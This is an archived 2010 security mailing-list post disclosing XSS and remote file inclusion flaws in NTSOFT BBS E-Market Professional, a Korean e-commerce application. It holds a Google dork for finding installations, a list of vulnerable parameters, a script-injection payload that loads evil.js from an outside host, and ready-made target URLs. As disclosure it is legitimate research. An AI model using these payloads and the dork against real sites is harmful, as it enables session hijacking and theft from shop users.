[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

NTSOFT BBS E-Market Professional = XSS / Remote Execution Code



 Dear Team,

> You can find attached the file, where I have found several bugs on this
> application-
>
> Thank you so much!
>
>
> Ing. Ivan Javier Sanchez
>      Nullcode Project
>
> Email:            Ivan.Sanchez@xxxxxxxxxxxxxxx
> Web Site:         http://www.nullcode.com.ar
> http://ar.linkedin.com/in/nullcode
>

+================================================================================================+
+                 NTSOFT BBS E-Market Professional  & XSS and Remote Execution Evil code         +
+================================================================================================+


Author(s): Ivan Sanchez 

Product:   NTSOFT, All Right Reserved.

Vendor Overview: NTSOFT. (Korean ecommerce application)

Vendor Homepage: http://www.nt.co.kr/



Date: 03/07/2010


"most off all korean sites that handle e-shop , e-banking,... use this software"


Description:
------------

BBS E-Market Professional is a Korean Web based e-commerce application implemented in PHP.

BBS E-Market Professional is reported to be affected by a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable system. 
The issue presents itself due to improper validation of user-supplied data. 




During 2009, I reported some bugs:
----------------------------------

http://www.packetstormsecurity.org/0907-exploits/ntsoft-xss.txt

http://www.securityfocus.com/bid/35893 

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3152

http://xforce.iss.net/xforce/xfdb/52157

http://secunia.com/advisories/26117

http://www.juniper.net/security/auto/vulnerabilities/vuln35893.html



GOOGLE DORKS:
------------

intext: "NTSOFT All rights reserved"



Parameters affected:

-------------------

2010:

pageurl=   evil.js
co_no=     evil.js
b_temcode= evil.js



2009:

page= evil.js
bt_code= evil.js
b_no= evil.js






Evil Code to put:
-----------------

Example:  "><script src=http://site/scripts/evil.js></script> 




Example URl affected:
---------------------


2009:

http://[TARGET]becommunity/community/index.php?pageurl=board&mode=view&b_no=Evil-code5014&bt_code=Evil-code&page=Evil-code



2010:

http://TARGET/becommunity/community/index.php?pageurl= EVIL_CODE


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=93809&b_no=434&bt_code=17&page=1&flg=3&co_no=EVIL_CODE


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=19&page=7&flg=EVIL_CODE &co_no=105580


http://TARGET/becommunity/community/index.php?pageurl=board&mode=comment_del&co_no=105580&b_no=5231&b_temcode=EVIL_CODEE&page=7&flg=3&co_no=105580





Thank you so Much! Ivan,


NULL CODE SERVICES [ www.nullcode.com.ar ] Hunting Security Bugs!

+================================================================================================+
+                  NTSOFT BBS E-Market Professional & XSS and Remote Execution Evil code         +
+================================================================================================+